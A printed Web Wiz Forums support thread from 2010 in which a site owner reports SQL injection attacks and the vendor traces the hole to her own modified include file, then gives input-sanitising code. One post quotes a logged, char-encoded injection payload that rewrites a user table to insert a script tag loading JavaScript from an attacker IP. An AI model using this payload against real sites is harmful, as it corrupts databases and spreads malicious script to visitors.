Web Wiz Forums - VIRUS Attack

Print Page | Close Window

VIRUS Attack

Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=28478
Printed Date: 02 April 2026 at 12:40am
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com

Topic: VIRUS Attack

Posted By: diaperpin-jen
Subject: VIRUS Attack
Date Posted: 05 April 2010 at 1:16pm

My web site has been attacked 3 days in a row via sql injections. I spent yesterday locking down all of my code to remove the possibility of a hacker updating my database. I did NOT touch the Web Wiz forum or Newspad code because I did not want to risk making a mess code I have not written.

I have many tables in my site but the only ones targeted were web wiz forums and web wiz newspad. Therefore I believe the hackers are familiar with Web Wiz table structures.

I am psting this note for two reasons.

First, to warn other web wiz customers that this is happening so you are ready just in case you are targeted as well.

Secondly to ask if others have had such a problem and if there are suggestions to close up any gaps, particularly from the forum or newspad code???

Replies:

Posted By: WebWiz-Bruce
Date Posted: 05 April 2010 at 1:41pm

There are no issue with SQL Injections in Web Wiz Forums or Web Wiz NewsPad.

These virus have been around along time and are generic attacking the structure of any database schema not just Web Wiz software. When they first appeared a few years ago we saw Web Wiz Forums and NewsPad installations get hit as many times as 20 per second by these SQL Injection Viruses, without causing any issues.

Over the last few years we have had a number of people who have had their databases compromised by these SQL Injection Virus convinced that the problem has been with Web Wiz Products, however after lengthy investigations it has always turned out the issue was caused by their own pages outside of Web Wiz software or modifications to the software.

I can be 100% sure that your SQL Injections will not be a result of Web Wiz Forums or NewsPad. You should look at your own pages on your website and any modifications that you have made to the Web Wiz software.

Many 1,000's of hours has and still is spent on security making sure that our products are the most secure available. Each month security audits are carried out looking at new threats and releasing new versions if any thing is found. For this reason many large hacking websites use our software and have also worked with us simulating attacks and looking for holes to ensure that our software is fully secure.

Web Wiz Forums and NewsPad is well protected against SQL Injection, it even goes as far in Web Wiz Forums 9.50 and above to detect an SQL Injection attack from one of these viruses and when detected stops the page processing to reduce server load and prevent DoS attacks that could over run a web server if a website came under a large attack from one of these SQL Injection viruses.

-------------
https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting
https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting

Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 1:30am

The hacker is back and I was able to log the problem.

The attack was in the form of sql injection through one of the forum pages. I am listing the information I logged below:

Page: /forum/registration_rules.asp
IP Address: 94.102.52.27

QueryString: FID=01+update+tblAuthor+set+Username=cast(Username+as+varchar(8000))%2Bcast(char(060)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(39)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(57)%2Bchar(52)%2Bchar(46)%2Bchar(49)%2Bchar(48)%2Bchar(50)%2Bchar(46)%2Bchar(53)%2Bchar(50)%2Bchar(46)%2Bchar(50)%2Bchar(55)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(39)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))--

I want to make sure other you and web wiz software uses are aware of this problem so you can deal with it immediately. I am in danger of having much of my data wiped out by this person. Each attack seems more and more destructive.

Please look into this page and lock it down best you can.

Posted By: WebWiz-Bruce
Date Posted: 06 April 2010 at 10:40am

I have just located your website from the email address used to register on this forum and have found the issue, which is to do with your own modifications!!

I have a look at your registration_rules.asp page and passed across a non-numeric value as part of the FID querystring, I then got an error which you would not get from an unmodified Web Wiz Forums.

The error was an SQL error on line 320 of the file includes/google_adsense_inc.asp. The original includes/google_adsense_inc.asp does not have a line 320 and also does not interact with the database.

It would seem that the problem here is that you have modified the file includes/google_adsense_inc.asp to include code that interacts with the database. This code does not appear to have any protection from SQL Injection.

To fix the issue you should either fix the modified code in the includes/google_adsense_inc.as, or better still upgrade to the latest version and not modify the code.

-------------
https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting
https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting

Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 11:43am

Yes - Thank you. I looked into this last night and saw that the hole was in google_adsense_inc.asp.

The error you received actually indicates that my changes worked. If you didn't get the error you would have succeeded in changing the values in my database.

Posted By: WebWiz-Bruce
Date Posted: 06 April 2010 at 12:15pm

I have just checked your forum and it is still vunerble to an SQL Injection attack. Maybe not the one that you posted, but it is still vulnerable, see the error got below:-

[Microsoft][ODBC SQL Server Driver][SQL 
Server]Incorrect syntax near 'test and a.author_id = p.author_id  and 
g.group_id = a.group_id  union  select g.name as groupname, a.username, 
a.author_id , 2 '.

This means that my input 'test along with the single quote break was still used in the SQL Query. This was only a test so no harm done, but I could change this to easily display content from your database, delete tables, etc.

You need to sanitise any querystring input before it is used in an SQL Query. In this case as you are using a numeric number parsed by FID querystring you can use the following:-

If isNumeric(Request.QueryString("FID")) Then
    intForumID = CInt(Request.QueryString("FID"))
Else
    intForumID = 0
End If

Then in your SQL reference the variable not the querystring.

-------------
https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting
https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting

Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 12:39pm

Thanks! I will look into it.

Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 1:20pm

Fixed. I appreciate you taking the time to look at my site. I will see how you handled text inputs as well......

Posted By: WebWiz-Bruce
Date Posted: 06 April 2010 at 2:02pm

Web Wiz Forums has a built in function for text that is to be used in SQL to filter out SQL Injections:-

strVariable = formatSQLInput(strVariable)

-------------
https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting
https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting

Print Page | Close Window

Forum Software by Web Wiz Forums® version 12.08 - https://www.webwizforums.com
Copyright ©2001-2026 Web Wiz Ltd. - https://www.webwiz.net